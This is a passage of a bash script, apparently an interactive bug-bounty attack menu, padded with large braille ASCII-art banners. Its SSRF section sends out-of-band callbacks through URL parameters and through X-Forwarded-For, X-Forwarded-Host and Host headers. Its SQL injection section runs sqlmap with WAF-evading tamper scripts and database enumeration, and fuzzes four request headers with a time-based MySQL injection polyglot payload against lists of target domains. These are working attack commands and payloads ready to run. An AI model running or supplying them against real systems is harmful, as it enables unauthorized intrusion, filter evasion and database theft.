314 | echo "\033[1;31m-------------------------------------------------\033[1;33m "
315 | read -p "[*] Enter your SSRF finding  method (1-2): " ssrf_choice 
316 | case $ssrf_choice in 
317 | 1)
318 | read -p "[+] Please Provide URL.txt file: " url_file
319 | read -p "[+] Please Past here your BurpCollaborator Link: " burpcollaborator_link
320 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
321 | echo "\e[5;92m Finding SSRF...\e[0m"
322 | cat $url_file |gf ssrf | sort -u |  grep "=" | qsreplace "$burpcollaborator_link" >> ssrf_test_targets.txt; ffuf -c -w ssrf_test_targets.txt -u FUZZ | anew SSRF.txt
323 | echo "\e[5;92m Finding Done!\e[0m"
324 | ;;
325 | 2)
326 | #Check Blind ssrf in Header,Path,Host & check xss via web cache poisoning.
327 | read -p "Please Provide domains.txt: " domain_file
328 | read -p "[+] Please Past here your BurpCollaborator Link: " burpcollaborator_link
329 | 
330 | cat $domain_file | while read url; do xss1=$(curl -s -L $url -H "X-Forwarded-For: xss.$burpcollaborator_link "|grep xss) xss2=$(curl -s -L $url -H "X-Forwarded-Host: xss.$burpcollaborator_link "|grep xss) xss3=$(curl -s -L $url -H "Host: xss.$burpcollaborator_link "|grep xss) xss4=$(curl -s -L $url --request-target "http://$burpcollaborator_link" --max-time 2); echo -e "\e[1;32m$url\e[0m""\n""Method[1] X-Forwarded-For: xss+ssrf => $xss1""\n""Method[2] X-Forwarded-Host: xss+ssrf ==> $xss2""\n""Method[3] Host: xss+ssrf ==> $xss3""\n""Method[4] GET http://xss.$burpcollaborator_link  HTTP/1.1 ""\n";done
331 | echo "\e[5;92m Finding Done!\e[0m"
332 | 
333 | ;;
334 |  
335 | 
336 | 
337 | *)
338 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
339 | echo "[!] \033[1;31mInvalid choice. Exiting..."
340 | exit 1
341 | ;;
342 | esac
343 | 
344 | ;;
345 | 6)
346 | echo "Testing for SQLi..."
347 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
348 | echo "⣿⣿⣿⡏⣼⣿⣿⣿⣿⣿⣿⡇⡿⢱⣿⣿⣿⣿⡿⣱⣯⣤⣭⣵⣶⡟⣿⣿⣿⣿⣿⠇⣽⣿⢻⣿⢋⣿⣿⣿⣇⢻⣿⣿⣿⣌⢿⣿⣿⣿⣿⢿⣿⣿⣿⣿⣿⣿⣿⣿⡜⣿⣿
349 | ⣿⣿⡟⣼⣿⣿⣿⣿⣿⣿⣿⢱⢣⣿⣿⣿⣿⡟⣱⢻⣿⣿⣿⣿⡿⢸⣿⣿⣿⣿⡟⣼⣿⡿⢸⡿⢸⣿⣿⣿⣿⡸⣿⣿⣿⣿⣧⡙⢿⣿⣿⣦⡹⣿⣿⣿⣿⣿⣿⣿⢷⠹⣿
350 | ⣿⣿⢱⣿⣿⣿⣿⣿⢇⣿⠇⢢⣿⣿⣿⡿⢋⣼⣿⢸⣿⣿⣿⣿⢃⣿⣿⣿⣿⢏⣼⣿⡿⢃⣿⢣⢠⣿⣿⢿⣿⣧⢻⣿⣿⣿⣇⠻⣷⣝⡻⣿⣿⣌⢿⣿⣿⣿⣿⣿⡌⣇⢿
351 | ⣿⡏⣾⣿⣿⣿⣿⡟⣼⠏⣴⣿⣿⡿⣋⢰⣿⣿⣿⢸⣿⢏⣿⢏⣾⣿⣿⡿⣡⣾⣿⠟⢡⡿⣡⢣⣿⣿⣿⢸⣿⣿⣎⢿⣿⣿⣿⡰⡙⣿⣿⣶⣭⣿⣦⠻⣿⣿⣿⣿⣿⡘⢸
352 | ⣿⠁⣿⣿⣿⣿⠟⠜⣡⡾⠿⣋⣵⢰⣿⡆⣿⣿⣿⡆⢋⣾⢏⣾⣿⡿⡫⠸⣿⡿⠋⢀⢏⣴⢃⡆⣿⡿⣿⡆⣿⣿⣿⣎⢻⣿⣿⣧⢻⣌⠻⣿⣿⣿⣿⣷⡹⣿⣿⣿⣿⣧⠁
353 | ⣿⢰⣿⣿⡿⠋⣾⡶⢰⣾⠃⣿⣿⠈⣿⠛⡘⣿⣿⣇⠘⠡⢞⢫⣵⠞⠅⠱⠋⣠⣾⣶⣿⢃⢺⣿⡸⣧⢻⣷⢹⣿⣿⣿⣷⡙⢿⣿⣆⠻⣷⣌⠻⢿⣿⣿⣷⡹⣿⣿⠹⣿⡆
354 | ⡇⣿⡿⣫⣴⡇⡿⡑⣼⡏⢸⣿⢫⢀⢿⠃⣷⠙⣿⣿⡐⡜⢣⡿⣫⠞⣄⣵⢿⣿⣿⡟⣱⠿⠎⢿⣧⢻⢀⢿⣇⠻⣿⣿⢿⣿⡌⡹⢿⣮⢪⡻⣇⠀⠉⠻⢿⣧⠙⣿⢰⢹⣿
355 | ⢹⡿⣰⢱⣿⡇⢣⡇⠟⢠⡿⢣⣿⢸⡘⢸⢹⡆⣌⠿⠃⢔⣩⠾⣡⣾⣿⡟⣼⡿⣫⣴⣶⣿⣷⠈⢻⣧⡁⣎⢿⣆⢌⠻⣧⢙⢿⡜⢦⣝⠣⡙⣮⣑⠙⣷⣤⣐⡀⣌⣸⡆⢿
356 | ⣼⡇⡏⡾⢻⢣⣼⡿⢠⢟⣵⡿⣋⡀⣷⠸⡏⠿⢌⣤⡶⢛⣥⣾⣿⢹⣿⢇⣥⣬⣭⣭⣭⣭⣭⣥⠲⡙⢿⣿⣧⡹⣎⢳⣬⡣⠱⣬⣂⣻⢻⣶⣴⣿⣿⣿⣿⣿⣿⣙⣿⣷⢪
357 | ⡇⢸⢧⢣⡸⢸⡟⠑⠡⢚⢥⣾⡿⢛⠜⠆⢻⣾⣿⣿⣷⣯⢹⣿⠟⣸⡟⠐⣤⣶⣦⣭⣭⣛⡻⢿⣷⡝⢶⣝⠻⣿⣮⡣⠻⣿⣿⣿⣿⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⢹⣿⢸
358 | ⣿⡘⢠⣿⣷⡉⡷⣶⣿⢿⠘⢫⣥⣶⣦⣐⠇⣹⣿⣿⣿⣿⢨⣴⢇⢟⣴⣿⢃⠴⠤⠄⣉⣙⠛⠷⣮⣽⣆⠻⣿⣶⣭⣛⠶⣜⣿⣿⣿⡟⡌⣿⣿⣿⣿⣿⣿⣿⢸⣿⢸⡿⣾
359 | ⣿⣷⣙⣿⣿⣷⢰⢿⣿⡜⢸⣿⣿⣿⣟⠫⠴⠛⢙⢿⡟⢿⣆⢛⠄⣛⣵⢡⣾⣿⣿⢨⠃⡘⢘⠷⣦⠉⡛⢸⢣⣿⣿⣿⣿⣿⣿⡇⡿⣡⣅⡛⢿⣿⣿⢻⣿⣿⢸⠇⢸⢇⣿
360 | ⣿⣿⣿⣿⣿⡿⢸⡇⡻⣷⡙⣿⠿⠿⣟⣛⡫⣠⣿⢷⣅⡐⠮⢌⢝⠿⣿⣿⣛⠿⣿⣌⣒⣡⣿⡿⢊⡔⣼⢈⣾⣿⡿⢻⣿⣿⣿⢁⣴⠿⣿⠿⣦⡹⡿⢸⣿⡏⡞⣼⠘⣼⣿
361 | ⣿⣿⣿⣿⣿⣷⢸⢃⣷⡎⡛⠦⠻⢿⡿⣋⣚⠋⣁⣠⢜⡹⢻⣷⣶⠇⣿⣿⣿⣯⣒⣉⠭⠭⢭⡔⠩⠚⣡⣿⡿⢟⣵⡿⣹⣿⠃⣫⡔⠦⠙⣷⢹⣇⢣⢸⣿⢃⣼⣋⣼⣿⣿
362 | ⣿⣿⣿⣿⣿⣿⣧⠛⣿⡇⣿⠿⡋⠀⣼⣿⣿⣿⠘⣛⠳⣾⣦⣝⣋⣾⣿⣿⣿⣿⣿⣿⣿⣏⠑⠬⠵⢟⣛⣩⠶⣛⡭⣰⡟⣡⡜⡻⢇⣿⢇⡟⣼⢇⣿⢸⢇⣾⣿⣿⣿⣿⣿
363 | ⣿⣿⣿⣿⣿⣿⣿⣷⣾⣇⠦⢪⢔⠴⣿⣿⣿⣿⣧⢻⠷⣈⣿⣿⣿⣿⣿⣿⣿⡿⢋⣽⣿⢿⡜⣿⠿⣛⣩⣵⡾⠟⢐⣍⢶⣮⡘⣿⣿⠟⡼⣱⢋⣾⣟⣀⣾⣿⣿⣿⣿⣿⣿
364 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡰⣧⠎⣼⣿⣿⣿⣿⣿⣷⣾⣿⣿⣿⣿⣿⣿⣿⢋⣴⡿⢋⣵⣾⣿⣶⣿⣿⣿⣿⣷⡿⢛⣭⣼⣿⠇⣼⣿⣑⠔⣡⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
365 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡙⣾⣿⣿⣿⣧⣭⣽⣛⣛⠿⠿⠿⣿⣿⡿⢿⣿⣿⣼⣿⣿⠿⣿⣿⣿⣿⣿⣿⣿⣧⣥⣶⣮⣥⣾⣿⠟⢫⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
366 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡝⢿⣿⣿⣿⡿⢿⣿⣿⣿⣿⣿⣶⡶⣚⣻⣭⣍⠿⢟⡵⣊⣿⣿⣿⣿⣿⢿⢟⠍⣹⣿⣿⡿⢛⣥⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
367 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣎⢻⣿⣿⣿⣦⣐⣂⣩⣿⣿⣿⣧⢹⣿⣿⣿⠘⣫⡾⡋⣸⣿⣿⢟⣥⡂⡜⣬⡭⡍⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
368 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⡹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢸⣿⣿⣿⡇⣿⣿⡾⢟⣫⣴⣿⣿⣧⠳⠜⠕⣱⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
369 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡌⢿⣿⣿⣿⣿⣿⣿⣿⣿⡏⡿⠿⣛⣣⣭⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⢣⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
370 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣮⣝⣛⣛⣛⠛⣯⣭⣵⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⠿⠿⢿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
371 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⣿⣿⣿⣿⡿⠿⢛⣛⣭⣭⣷⣶⣶⣾⣿⣿⣿⣿⣿⣶⣶⣾⣭⣭⣛⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
372 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⢟⣋⣭⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣮⣝⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿
373 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⣋⣭⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿
374 | ⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⠟⠻⣛⠛⣛⣋⣑⡺⠿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿
375 | ⣿⣿⣿⣿⠟⣛⣭⣶⢪⣾⣿⣿⡟⣼⣿⣿⣿⢏⣾⣿⣿⣶⡮⣩⣛⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⣛⣛⠋⠉⠩⠭⠍⠛⢛⡛
376 | ⣿⠿⡫⣰⣿⣿⣿⡏⣾⣿⣿⣿⢧⣿⣿⣿⡿⣼⣿⣿⣿⣿⢱⣿⣿⣿⣷⡶⣭⣝⣛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⣿⡿⢸⣿⣿⣿⢣⣾⣶⡾
377 | ⢡⣾⢱⣿⣿⣿⣿⢣⣿⣿⣿⡿⣸⣿⣿⣿⡇⣿⣿⣿⣿⡇⣿⣿⣿⣿⣿⢱⣿⣿⣿⣿⢳⣶⣭⣝⣛⠻⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠹⣧⠽⠿⣛⣛⡬⣽⣶⣾
378 | ⣾⣿⣼⣿⣿⣿⡿⢸⣿⣿⣿⢇⣿⣿⣿⣿⢸⣿⣿⣿⣿⢳⣿⣿⣿⣿⡏⣾⣿⣿⣿⣿⢸⣿⣿⣿⣿⣮⢻⣷⣶⣶⣾⣍⢩⣭⣭⣿⣿⣟⢻⣶⣶⣶⣾⡍⣿⣿⣿⣿⡜⣿⣿
379 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⣼⣿⣿⣿⡏⣾⣿⣿⣿⣿⢸⣿⣿⣿⣿⢧⣿⣿⣿⣿⣿⢸⣿⣿⣿⣿⣿⢸⣿⣿⣿⣿⣿⢸⣿⣿⣿⣿⣿⡎⣿⣿⣿⣿⣿⢸⣿⣿⣿⣷⢻⣿"
380 | echo "\033[0;31m-------------------------------------------------\033[0;33m "
381 | Target
382 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
383 | echo "\033[1;35m[*] Use \033[1;33mSqlmap\033[1;35m to  bypass WAF by using Tampering                            [1]"
384 | echo "\033[0;35m[*] Find Time Base SQL Injection                                            [2]\033[1;33m"
385 | read -p "[*] Enter your SQLi Finding method (1-2): " sql_choice 
386 | case $sql_choice in
387 | 1)
388 | read -p "[+] Please provide 1 domain name : " url
389 | read -p "[?] Do you want to  test (All types of sqli) [1] or (Only Time base) [2] : " protocol
390 | case $protocol in 
391 | 2) 
392 | read -p "[+] Please copy your cookie Values from BURP request and Past it here : Cookie= " cookie
393 | sqlmap -u "$url" --level=5 --crawl=10 --risk=3 --cookie="$cookie" --tamper=apostrophemask,apostrophenullencode,base64encode,between,charencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbs --random-agent --technique=T --batch 
394 | ;;
395 | 1)
396 | read -p "[+] Please copy your cookie Values from BURP request and Past it here : Cookie= " cookie
397 | sqlmap -u "$url" --level=5 --crawl=10 --risk=3 --cookie="$cookie"  --tamper=apostrophemask,apostrophenullencode,base64encode,between,charencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbs --random-agent --batch 
398 | ;;
399 | *)
400 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
401 | echo "[!] \033[1;31mInvalid choice. Exiting..."
402 | exit 1
403 | ;;
404 | esac
405 | ;;
406 | 
407 | 2)
408 | echo " Finding Header Time Base SQL Injection!  "
409 | pwd
410 | ls
411 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
412 | read -p "[+] Please provide Domains.txt file: " domain_file
413 | echo "\033[0;31m-------------------------------------------------\033[0;33m "
414 | echo "[*] X-Forwarded-For:       (1)"
415 | echo "[*] X-Host:                (2)"
416 | echo "[*] Referer:               (3)"
417 | echo "[*] User-Agent:            (4)"
418 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
419 | read -p "Please choose any one  Header (1-4): " header
420 | echo "\e[5;92m Finding Header base SQLi...\e[0m"
421 | case $header in
422 | 1)
423 | ffuf -w $domain_file -u FUZZ -H "X-Forwarded-For: IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5)))OR'|'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(5)))OR'*/" -c 200 -o json --timeout 6 | tee -a Header_SQLi.txt
424 | echo "\e[5;92m Finding Done!\e[0m"
425 | ;;
426 | 2)
427 | ffuf -w $domain_file -u FUZZ -H "X-Host: IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5)))OR'|'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(5)))OR'*/" -c 200 -o json --timeout 6 | tee -a Header_SQLi.txt
428 | echo "\e[5;92m Finding Done!\e[0m"
429 | ;;
430 | 3)
431 | ffuf -w $domain_file -u FUZZ -H "Referer: IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5)))OR'|'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(5)))OR'*/" -c 200 -o json --timeout 6 | tee -a Header_SQLi.txt
432 | echo "\e[5;92m Finding Done!\e[0m"
433 | ;;
434 | 4)
435 | ffuf -w $domain_file -u FUZZ -H "User-Agent: IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5)))OR'|'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(5)))OR'*/" -c 200 -o json --timeout 6 | tee -a Header_SQLi.txt
436 | echo "\e[5;92m Finding Done!\e[0m"
437 | ;;
438 | 
439 | 
440 | *)
441 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
442 | echo "[!] \033[1;31mInvalid choice. Exiting..."
443 | exit 1
444 | ;;
445 | esac
446 | ;;
447 | 
448 | # echo "Its End of this header case " 
449 | 
450 | 
451 | 
452 | 
453 | 
454 | *)
455 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
456 | echo "[!] \033[1;31mInvalid choice. Exiting..."
457 | exit 1
458 | ;;
459 | esac
460 | ;;
461 | 
462 | *)
463 | echo "\033[1;31m-------------------------------------------------\033[1;33m\e[5;1;91m "
464 | ifconfig | grep broadcast | awk '{print $2}'
465 | echo "\033[1;31m-------------------------------------------------\033[1;33m\e[5;1;91m "
466 | echo "⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⠀⠀⢤⣄⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
467 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠲⡄⠀⠀⠀⠀⠀⠀⠀
468 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡼⠀⠀⠀⠀⠀⠀⠀
469 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡁⠀⠀⠀⠀⠀⠀⠀
470 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣇⠀⠀⠀⠀⠀⠀⠀
471 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡤⢖⣠⡴⠒⠊⠁⠠⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠘⣆⠀⠀⠀⠀⠀⠀
472 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⢞⣡⠖⠉⠚⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠒⠲⠶⠶⠶⠶⢒⡲⠒⠀⠀⠀⠀⠈⢣⣀⠀⠀⠀⠀
473 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⠏⠈⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡠⠴⠭⠤⠤⣄⣀⣀⡀⠀⠀⠈⠳⠤⣀⡀
474 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⠴⠛⠁⠀⠀⠀⠀⠀⠀⠀
475 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣰⠃⠀⠀⠀⣀⣤⣤⣤⣤⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡔⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
476 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣿⠀⠀⣠⣾⡿⡝⠂⠀⠈⠉⠙⠻⣶⣤⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢉⣩⠥⠶⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀
477 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠃⢠⣾⣿⣿⡇⠀⠀⠀⠰⣞⢽⣿⠀⠉⢷⡀⢰⠀⠀⠀⠀⠀⠰⡚⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
478 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⠿⠿⣿⢿⣶⣤⣀⠉⠉⠀⠀⠀⢳⣸⠀⢸⠀⠀⢀⠀⠈⠳⢤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
479 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⠏⠘⣉⣛⣉⣳⠻⡝⠿⣿⣦⣄⡀⠀⢸⣿⡄⣼⠀⠀⢹⡅⠀⠈⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
480 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⠇⠀⠀⠛⠛⠛⠋⣠⣿⣷⣮⡻⣿⣿⣶⣾⣿⣧⣿⠸⢦⡀⢳⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
481 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⡻⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢤⡆⠙⢾⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
482 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡆⣽⠀⢀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⣿⠃⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
483 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠿⢧⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
484 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣤⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
485 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡏⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⠁⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
486 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡤⠖⣾⡷⢤⠋⢬⣿⡿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⡆⢠⠁⠀⣞⠙⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
487 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⠁⠀⡟⡇⠈⠓⢶⣿⣿⣿⣾⣿⣿⣿⣿⣷⣿⣿⠋⢉⢹⠀⠀⣿⠀⢳⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
488 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠀⠀⡇⠀⢠⠃⢈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠁⢸⠀⠀⣿⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
489 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⠀⠀⡿⠀⠐⡀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⠀⣼⠀⢰⠻⠀⣸⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀
490 | ⠀⠀⠀⠀⠀⠀⢀⣠⠤⠖⢻⠀⠀⣷⡆⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⣼⡇⢠⠏⠓⠦⣄⠀⠀⠀⠀⣠⠖⠋⠁⠀⠀⠀⠀⠀⠀
491 | ⠀⠀⠀⣠⠶⠋⠉⠀⠀⠀⠈⠳⣄⣿⣳⠶⠋⠁⠐⠚⠛⠻⠈⡿⣏⠉⠉⠉⠉⠀⠀⠻⣶⣿⠷⠛⠀⠀⠀⠀⠉⠑⠲⣌⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
492 | ⠀⢠⠞⠳⢄⡀⠀⢀⣀⠀⠀⠀⠀⠈⣏⣶⢦⠀⠀⠀⠀⠀⠀⣿⠚⠀⠀⠀⠀⣀⠀⣴⣳⠋⠀⣀⣠⠖⠀⠀⠀⠀⣀⠬⠷⡄⠀⠀⠀⠀⠀⠀⠀⠀
493 | ⠀⢸⣠⣿⣦⡙⢦⡀⠈⠳⣄⣀⡀⠀⢸⠸⡄⠳⡀⠀⠀⠀⢸⡙⠀⠀⠀⠀⡸⠁⢰⠣⣇⠀⠀⠛⠁⠀⠀⢀⣴⣺⣵⣿⣆⡇⠀⠀⠀⠀⠀⠀⠀⠀
494 | ⠀⠈⡿⣿⣿⣿⣦⡙⢦⡀⠈⠙⣃⣠⠼⣠⠇⠀⢣⠀⠀⠀⣿⡇⠀⠀⠀⡼⠁⠀⠘⠲⢭⣓⣒⠦⢤⣠⠔⣫⣾⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀
495 | ⠀⢠⡇⢸⣿⣿⣿⣷⣤⣉⣉⣭⠽⠖⠋⠁⠀⠀⠘⡇⠀⠀⡿⡇⠀⠀⣼⠁⠀⠀⠀⠀⠀⠀⠉⢹⣶⣶⣾⣿⣿⣿⣿⡟⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀
